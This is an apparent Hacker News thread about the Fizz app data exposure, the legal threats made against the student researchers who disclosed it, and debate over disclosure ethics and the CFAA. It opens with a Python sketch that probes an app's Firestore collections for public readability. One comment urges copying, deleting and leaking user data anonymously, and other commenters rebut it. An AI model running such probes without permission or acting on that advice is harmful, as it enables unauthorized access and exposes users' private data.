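As a rough starting point, the core of such a tool is small. Here's a sketch of the kind of checker I have in mind, using the public Firestore REST API; the project ID, collection names, and optional key/token are all assumptions for illustration:

```python
# Rough sketch: given a project ID (from the app's public client config) and
# some guessed collection names, report which ones the Firestore REST API
# will list. Pass an ID token for the "only visible to logged-in users" case.
import requests

def check_collections(project_id, collections, api_key=None, id_token=None):
    headers = {"Authorization": f"Bearer {id_token}"} if id_token else {}
    for name in collections:
        url = (f"https://firestore.googleapis.com/v1/projects/{project_id}"
               f"/databases/(default)/documents/{name}")
        params = {"pageSize": 1}
        if api_key:
            params["key"] = api_key
        resp = requests.get(url, headers=headers, params=params)
        if resp.status_code == 200 and resp.json().get("documents"):
            print(f"{name}: readable")
        else:
            print(f"{name}: not readable (HTTP {resp.status_code})")

# Example with hypothetical names:
# check_collections("example-project", ["users", "posts", "moderators"])
```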
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light: https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
I'm not even suggesting it has to happen at a legal level, but perhaps at a professional level. I would think any lawyer writing baseless threatening letters to people should be subject to losing their license.
Perhaps they shouldn't. If we lived in a world where lawyers were more cautious about what they attached their name to out of concern for losing their license, we would probably be better off. Less bullying by corporations with lots of money, etc. No problems with demand letters for legitimate issues that are well supported by evidence, though.
>If we lived in a world where lawyers were more cautious about what they attached their name to out of concern for losing their license we would probably be better off.
That's already the case. Lawyers can be disbarred for filing frivolous lawsuits.
I'm in favor of the work done by the security researchers, and the defense offered by the EFF. However, your first comment was such a surface level understanding, and I wanted to bring it back to reality.
The general form of such a "legal threat" (threat relating to the law) is perfectly reasonable, normal, and legal (as in, conforming to the law). It's a standard part of practicing law.
However, in this specific case, they do appear to have broken one professional rule, regarding the threat of criminal prosecution conditional on a civil demand.
Aside from that one professional rule, the Fizz/Buzz letter was probably perfectly technically accurate. Whether the DA would take up the case, I doubt, but that's up to their discretion/advice from the DoJ, not based on the legal code.
I think Fizz/Buzz were incredibly foolish to send such a letter, as the researchers were essentially good samaritans being punished for their good deed (probably only because customers don't like it when supposedly professional organizations are found to be in need of such basic good deeds from good samaritans, and Fizz/Buzz would rather punish the good samaritans instead of "suffering" the "embarrassment" of public knowledge).
You seem to have the facts of this case incorrect. They definitely broke the law by hacking this app without prior authorization. You may disagree with the law but I don’t understand how you made the leap to calling for the suspension of specific attorneys.
The role of a lawyer is to make persuasive arguments in their clients favor, and those arguments are supported by a wide spectrum in strength of evidence and legal opinion.
Completely baseless stuff can get lawyers disbarred, but many things are shades of gray. The way the CFAA is written, just about any security research on someone else's machine that doesn't include "we got permission in advance" often falls into this gray area.
The fact that the DOJ doesn't prosecute good-faith security research is DOJ policy, not actual law. The law as-written doesn't have a good-faith exemption.
IANAL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
2. At a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. Threatening to do a legal act is largely legal. It's not illegal to threaten reporting to the authorities, for instance.
Just pointing out the absurdity of it. I would much rather get punched in the face than serve 20 years in prison, but it is illegal to threaten the former, but perfectly fine to threaten the latter.
>I would much rather get punched in the face than serve 20 years in prison, but it is illegal to threaten the former, but perfectly fine to threaten the latter.
How about you don't do the action that makes you punishable with 20 years in prison?
On a more practical level, if someone is breaking into your house, should it be illegal to tell them to stop, on pain of you calling the police which presumably would cause them to be incarcerated?
> On a more practical level, if someone is breaking into your house, should it be illegal to tell them to stop, on pain of you calling the police which presumably would cause them to be incarcerated?
Not a lawyer, but there's a fine line between extortion and not-extortion.
It's not extortion when you're making the threat to either stop an illegal behavior or secure something you already have rights to. Like, "I'm calling the cops if you don't return the kids on the time/date we agreed on in the goddamn divorce papers" is not extortion, because you have a legitimate claim to defend.
It is extortion when you're trying to use the threat of law enforcement as a means of engineering consent or coercing someone into doing something. Like, "I'm going to call the cops and tell them about your shoplifting unless you send me nudes/pay me $500/keep your mouth shut." You can't leverage withheld knowledge of a crime as a means of controlling someone. Otherwise it opens the door to "Remember that time you raped me? You need to do me another favor to make it right"-type of arrangements.
The first example would be extortion if the kids were returned late but it was not reported, and the other party continued threatening to report it after the fact to enforce future compliance.
"It would be legitimate" is just an assertion. The entire debate is about what is legitimate and what is not. You're supposed to be saying why things are or are not legitimate, either legally or morally.
Sure, but if I shoot someone in self defense, there will be an investigation and I have to show why I thought it was legitimate. If a lawyer writes a baseless threatening letter, at the very least I should be able to have the bar association investigate.
The person sending the letter also doesn't have a prison nor the power to put anyone in it. It is a persuasive legal letter stating someone's opinion about what someone else could potentially do.
A more equal comparison might be "If you tease a gorilla they might seriously hurt you"
Perfectly legal, but unethical. The motives are clear, they want to threaten/bully someone into silence who has information that could hurt their business. I don't think lawyers that engage in this behavior should be allowed to practice law, that's all.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure" while knowing you are not secure - and that your users have no protection against spying from you or any minimally competent hacker - is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
They could not have been ignorant of storing non-anonymous, plain-text messages. Even if we don't count that as insecure, they can only appeal to ignorance/negligence up until the point the security researchers informed them of their vulnerabilities.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Interesting. My school has a very similar platform, SideChat, which I doubt is much different. Makes me wonder how much they know about me, as I was permanently banned last year for questioning the validity of "gender-affirming care."
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?"
This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I think in a follow-up article by the Stanford Daily they said the app creators have gotten a few million in funding and lots of professional help, including to fix security issues. Although it still looks like user data is not fully anonymized internally like they had previously claimed.
I think I might be a bit of an outlier on this, but I struggle to see the value of imposing an embargo date in a security disclosure unless it's sent to a large institution that is used to a formal process like that. In most cases, if you're trying to communicate to someone that you've found a vulnerability on the premise that you're doing it for the greater good, why begin the relationship with a deadline before you "go public"? Wouldn't that be something you do later on, if it appears that they're just blowing you off and won't do anything about it?
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It doesn't give them any wiggle room to lead you on, it doesn't give you any wiggle room to say 'unacceptable or I blow the whistle tomorrow', it removes your judgement of the situation from the disclosure entirely. It is the safest option for people who are great at finding things worth disclosing but not so great at situation-judging.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Security researchers have a duty to users and industry first, then to the specific companies they are disclosing to. Most companies, without time pressure, do absolutely nil to fix the issues they are made aware of.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
Do you disagree that users might be entitled to know when a corporation is misusing their private, sensitive information? What is ethical does not begin and end with the corporation's best interest; the users whose private information is being mishandled are the victims here, let us not lose perspective.
Users who have been falsely assured that their data is both totally anonymous and "100% secure."
On the other hand, assuming the app creators were in far over their heads when it comes to proper security, I have to wonder if they started off cordially and then freaked out a short while later because, after trying, they realized there was no possible way for them to correct the issue in the given timeline. So in desperation they resorted to something drastic (and arguably unethical) to cover their asses.
> One Friday night, we decided to explore whether Fizz was really “100% secure” like they claimed. Well, dear reader, Fizz was not 100% secure. In fact, they hardly had any security protections at all.
It's practically a given that the actual security (or privacy) of a piece of software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
There should be harsher penalties for lawyers like Hopkins & Carley for threatening security researchers and engaging in unprofessional conduct like this.
Anyone can make a threat. There's a bit of smarts needed to classify a "threat" as credible or not. Only really a law enforcement officer can credibly bring charges against you. Unfortunately, we live in a society where someone with more money than you can use the courts to harass you, so even if you don't fear illegitimate felony charges, you can pretty much get sued for any reason at any time, which brings with it consequences if you don't have a lawyer to deal with it. So I understand why someone might be scared in this situation, and luckily they were able to find someone to work with them, pro bono. I really wish the law had some proactive mechanism for dealing with this type of legal bullying.
In my opinion, they went too far and exposed themselves by telling the company.
In all honesty, nothing good usually comes from that. If they wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or the public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
The story has greatly reduced value without knowing who the individuals behind Fizz really are. So that we can avoid doing business with them. It would be different if Fizz was a product of a megacorporation.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck buoy/marker over the names.
I realize it is quick to be against Fizz, but I thought ethical hacking required prior permission.
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(a) There's no such thing as "ethical hacking" (that's an Orwellian term designed to imply that testing conducted in ways unfavorable to vendors is "unethical").
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Weird stance. Sure, you may disagree on the limitations of scope of various ethical hacking programs (bug bounties and such) but they consistently highlight some very serious flaws in all kinds of hardware and software.
Going out of scope (hacking a company with no program in place) is always a gamble and you’re betting on the leniency of the target. Probably not worth it unless you like to live dangerously.
His point is that the way the term is used, to protect vendors, has nothing to do with ethics.
If a researcher found a serious vuln, the ethical thing may very well be to document it publicly without coordination with the vendor, especially if such coordination hurts users.
I disagree with (a). Activities can be deemed ethical or unethical, and those norms are presumably reflected in our laws (as unauthorized hacking is). When they're not constrained by law (as certain publication and experimentation practices aren't), then they are constrained by social convention.
This is one of those cases, like "Zero Trust Networking" where you can't derive the meaning of a term axiomatically from the individual words. There is "responsible" and "irresponsible" disclosure, too, but "responsible disclosure" is also a specific, Orwellian basket of vendor-friendly policies that have little to do with ethics or responsibility.
"Responsible" and "irresponsible" are slippier words in the disclosure context. In the civil legal context, "responsibility" implies blameworthiness and liability arising out of a duty of care and a breach of the duty. But in the vulnerability disclosure context, since there's no duty prescribed by law, it has come to mean "social" vs. "antisocial" - getting along vs. being at odds.
My point is that it doesn't matter how slippery the underlying words are, because you're not meant to piece together the meaning of the statement from those words --- or rather, you are, but deceptively, by attributing them to the policy preferences of the people who coined the term.
Logomachy aside: "ethical hacking" was a term invented by huge companies in the 1990s to co-opt security research, which was at the time largely driven by small independent firms. You didn't want to engage just anybody, the logic went, because lots of those people were secretly criminals. No, you wanted an "ethical hacker" (later: a certified ethical hacker), who you could trust not to commit crimes while working for you.
I guess what I'm trying to say is that there is, and can be, such a thing as "ethical hacking," but perhaps it's not coterminous with what vendors and others might claim it to be. The meanings of words evolve over time, sometimes for the worse (cough "literally"), and sometimes for the better. Groups have also reclaimed derogatory words through concerted action.
It's a complicated human activity, so of course there are ethics to it. But I'd strongly recommend not using the words "ethical hacker" next to each other, because that term has more meaning than you probably intend.
"Ethical hacking" is from the same vein as "responsible disclosure". These are weasel words that are used to demean security researchers who don't kiss the vendors' ass.
As a security researcher, my ethical obligation is not to the vendors of the software. It's to the users.
Ethically speaking, I don't care if my research makes the vendor look bad, hurts their sales, makes their PR team sad, etc. I similarly don't care if my research makes the vendor look good.
Are the users better protected by my research? If yes, ethical. If not, unethical.
Terms like "ethical hacking" are used to stilt the conversation in the favor of vendors.
> the database was running in the cloud, not on any computer they controlled.
If it's running in the Cloud, but in your Cloud account, it's morally equivalent to running on Your Machine. I'm not sure how the law will interpret anything, but absent a compelling counter-argument, I don't imagine lawyers will argue differently.
No, because there's no such thing as "ethical hacking"; that's a marketing term invented by vendors to constrain researchers. You'd call what you're talking about "pentesting" or "red teaming". How you'd know you had a clownish pentest vendor would be if they themselves called it "ethical hacking".
There is no precedent for consequence-free probing of others' defenses. Unauthorized "testing conducted in ways unfavorable to vendors" is generally considered a crime of trespass, because everybody has the right to exist unmolested. Whether or not they have their shit together, you aren't authorized to test your kids' school's evacuation procedure by randomly showing up with a toy gun and a vest rigged with hotdogs and wires.
The way this goes in the digital space, people expect to break into my "house," see if they can get into my safe, snoop around in my wife's/daughter's nightstands, steal some of their underwear as a CTF exercise, help themselves to my liquor on the way out, then send me an invoice for their time while also demanding the right (or threatening) to publish everything they found on their blog. Unsolicited "security research" is a shakedown desperate to legitimize itself. Unlawful search/"fruit of the poisoned tree" exists to keep the cops from doing this to you, but it's totally acceptable for self-appointed "researchers" to do to anybody else I guess.
"Ethical hacking" is notifying the owner/authorities there's a potential problem at an address, seeing if they want your help in investigating, and working with them in that capacity-- proceeding to investigate only with explicit direction. Even if their incompetence or negligence in response affects you personally, that's not a cue to break a window and run your own investigation while collecting leverage you can use to shame them into compliance. That shit is just espionage masquerading as concern trolling.
You're doing the same thing the other commenters are: you're trying to derive from first principles what "ethical hacking" means. That's why this marketing trick is so insidious: everybody does that, and attributes to the term whatever they think the right things are. But the term doesn't mean those right things: it means what the vendors meant, which is: co-opted researchers working in collusion with vendors to give dev teams the maximum conceivable amount of time to apply fixes (years, often) and never revealing the details of any flaws (also: that any security researcher that doesn't put the word "ethical" in their title is endorsing criminal hacking; also: that you should buy all your security services from I.B.M.).
You can say "that's not what I mean by ethical hacking", but that doesn't matter, because that's what the term of art itself does mean.
If you want to live in a little rhetorical bubble where terms of art mean what you think they should mean, that's fine. I think it's worth being aware that, to practitioners, that's not what the terms mean, and that people familiar with the field generally won't care about your idiosyncratic definitions.
As a point of comparison, we don't talk about "ethical plumbing" as a term. If a company hires a plumber to fix their bathroom, they're just a plumber. If somebody breaks the law to enter a place and mess with the pipes, they're just a trespasser.
But the companies that brand themselves as selling "ethical" penetration testing, and that sell certifications for "ethical hacking", would very much like you to lump other companies and other security researchers who operate legally into the same mental bucket as criminals by implicitly painting them as "unethical".
Ethically, they did the good thing by challenging the "100% secure" claim. Legally, they were hacking (without permission). Very high praise to the EFF for getting them out of trouble. Go donate.
Given the aggressive response from this company, it is less likely that it will become the target of any security researchers in the future (who wants the hassle?). That by itself makes their app less secure in the long term. Also, who'd want to support founders with this "I will destroy you, even though you helped me improve my system!" mentality? I wouldn't be surprised if this startup dies off because of this.
Kudos to Cooper, Miles and Aditya for seeing this through.
Alternatively, it will attract the attention of less-noble researchers who won't bother with responsible disclosure rules — they'll just leak data or tinker with the system. But I agree that well-intentioned security researchers will be less likely to look into this platform.
A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
Yes, threatening to report is what was really happening here. But in their effort to scare us, they elided much of that process. From our perspective it was "watch out, you might face felony charges if you don't agree to silence".
As the linked article notes, it's explicitly against the California State Bar Code of Conduct to threaten criminal proceedings in order to obtain an advantage in a civil matter, so while not technically illegal it's censurable - and that sanction falls on the attorneys who made the threat, not the clients they represent.
What I'm pondering is how what happened in TFA is different from a situation like:
1. I (legally) gather evidence of a neighbor committing a criminal action; e.g. take a picture of them selling illicit drugs.
2. I threaten to send the evidence to the authorities unless they pay me money.
That seems like blackmail to me, which is illegal under both state and federal law. The only difference I can think of is the consideration. If the consideration must be property for it to count as blackmail, then what about this situation:
1. I'm engaged in a civil dispute with my neighbor
2. I gather evidence of them committing a criminal action
3. I threaten to reveal the evidence unless they settle in my favor
Does that magically become legal because no money changes hands?
> A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
Those classmates committed felony extortion with their threat, just as an aside.
That would've been a better legal threat to put on them as an offensive move, instead of using the EFF. "Sure, you can attempt to have me jailed, but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
> Stay calm. I can’t tell you how much I wanted to curse out the Fizz team over email. But no. We had to keep it professional — even as they resorted to legal scare tactics. Your goal when you get a legal threat is to stay out of trouble. To resolve the situation. That’s it. The temporary satisfaction of saying “fuck you” isn’t worth giving up the possibility of an amicable resolution.
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
My ego has probably by now rewritten my memories to match who I am today. This situation seems like it would have had me and my friends laughing, not scared. Brains are weird.
> If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding.
Do you think that someone less ethically minded could have resolved the issue more simply by redirecting their landing page to a warning that the site was insecure and shutting it down, incurring near-zero personal risk of retaliation and letting people make an informed choice about continuing to use the site?
This is wholly and obviously illegal, but so is the described ethical hacking. You have adopted a complex, nuanced strategy to minimize harm to all parties. This is great morally, but as far as I can tell it's only meaningful legally insofar as it makes folks less likely to go after you; nothing about it makes your obviously illegal actions legal. So if you are going to openly flout the law, it makes sense to put less of a target on your back while you are breaking it.
Best advice I can give someone is never do security research for a company without express written consent to do so, and document everything as agreed to.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
Unless you're looking to earn a bounty, always disclose testing of this type anonymously. Clean device, clean wi-fi, new accounts. That way, if they threaten you instead of thanking you, you can just drop the exploit details publicly and wash your hands of it.
This sounds a lot less interesting than the title makes it out to be. Is the fact that it is a "classmate" really relevant? Would the events have happened differently if it was another company with no connection to the school?
In short, if a company claims to be 100% secure and isn't, it is committing fraud. The person doing the testing is providing the evidence for a legal case, and no amount of legal threats changes that.
The article asserts "there are an increasing number of resources available to good-faith security researchers who face legal threats". Is there an example of such, outside of the EFF? How do beginners find them?
Makes me so happy to know EFF and ethical hackers like this exist. I know they can’t test every app and every situation, but that there are hobbyists like this is such a testimony to humanity.
This isn't the first time a security researcher who's politely and confidentially disclosed a vulnerability has been threatened. There's an important lesson to glean from this.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3), and done so anonymously, that would not only have protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist, since all of Buzz/Fizz's users would likely abandon it as a consequence.
> The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and [4] protect their anonymity while doing all 3 of these.
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
So your solution for possibly being prosecuted for something marginal is to do several things for which it would be much more reasonable to be prosecuted? That seems like a rather unwise solution to the problem.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
Yeah, it’s unwise, but also a fair warning. If you threaten someone who has leverage over you, you might find your own problems escalated. Not everyone behaves perfectly rationally under pressure.
I'd suggest reading tptacek's comment: https://news.ycombinator.com/item?id=37298589 which does not 100% address your exact question, but gets close. As disclaimed, tptacek is not a lawyer, but has a lot of experience in this space and I'd still take it as a first pass answer.
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
> And then, one day, they sent us a threat. A crazy threat. I remember it vividly. I was just finishing a run when the email came in. And my heart rate went up after I stopped running. That’s not what’s supposed to happen. They said that we had violated state and federal law. They threatened us with civil and criminal charges. 20 years in prison. They really just threw everything they could at us. And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action. We had five days to respond.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc.)? He reported the security flaw responsibly, and because it was embarrassing to the State, the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing, so I just ignored it, and for all I know those people have had their data stolen multiple times over because of this flaw. I found it as part of my job at the time; I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
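To make that anti-pattern concrete, here's a minimal sketch. Every endpoint and field name below is hypothetical (this is not the actual site's API): the page only renders a couple of fields, but the unauthenticated JSON it fetches contains the whole record. The fix is to whitelist public fields on the server, rather than relying on the frontend to hide the rest.

    # Hypothetical illustration of the over-exposure pattern described above.
    #
    # The HTML page renders only name and license number, but the JSON the
    # page fetches is the full record, with no authentication required:
    #
    #   GET https://example-state.gov/api/licensees/12345
    #   -> {"name": ..., "license_no": ..., "ssn": ..., "home_address": ...}
    #
    # Server-side fix: serialize only the fields that are meant to be public.

    PUBLIC_FIELDS = {"name", "license_no", "license_status"}

    def serialize_licensee(record: dict) -> dict:
        """Return only the fields that are actually public."""
        return {k: v for k, v in record.items() if k in PUBLIC_FIELDS}

    if __name__ == "__main__":
        full_record = {
            "name": "Jane Doe",
            "license_no": "MD-0001",
            "license_status": "active",
            "ssn": "123-45-6789",            # should never leave the server
            "home_address": "1 Example St",  # should never leave the server
        }
        print(serialize_licensee(full_record))
        # {'name': 'Jane Doe', 'license_no': 'MD-0001', 'license_status': 'active'}

The point is that "the frontend doesn't show it" is not a security control; anyone who opens the network tab sees everything the API returns.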
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security researcher pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
We need personal data protection laws in this country so that as an individual after a data breach at wherever I can personally sue them for damages. Potentially very significant damages if they leak a full dossier like a credit reporting agency.
If that happens the whole calculus of bug bounties changes immediately.
I understand there has been some progress on this front, but it's not nearly enough. We need stronger protections for whistleblowers and security researchers. Corporations and legislators won't write these laws for us because it's not particularly in their interest. Well, maybe Senator Wyden and a few other highly ethical and tech-savvy legislators will help, but the onus is on us as concerned citizens and perennial victims.
Perhaps before killing someone with a comment, you should provide examples to back up your vitriol? The guidelines were reposted a mere four days ago...
Yet another example of someone security "testing" someone else's servers/systems without permission. That's called hacking. Doesn't matter if you have "good faith" or not. It's not your property and you don't get to access it in ways the owners don't desire you to access it without being subject to potential civil and criminal enforcement against you.
Meanwhile companies leak the private data of millions of people and nothing happens.
If a curious kid does a port scan, police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what more could we have done, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so let's all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
Look at it from a consumer rights angle. A product is advertised as having some feature ("100% security" in this case), but nobody is allowed to test (even without causing any harm) if that is true.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
As a user of the site who has been falsely assured that your data is "100% secure" and totally anonymous, is that data in fact not your property? Perhaps not in a strictly legal sense, but from an ethical standpoint it is certainly more of a grey area than corporations and their lawyers would want us to roll over and accept.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?
No, let's bury our heads in the sand while being sure to handicap (and treat as hostile) the only group of people who seem to care and have the expertise to do something about this giant mess we are in with regards to consumer, patient, and citizen data security.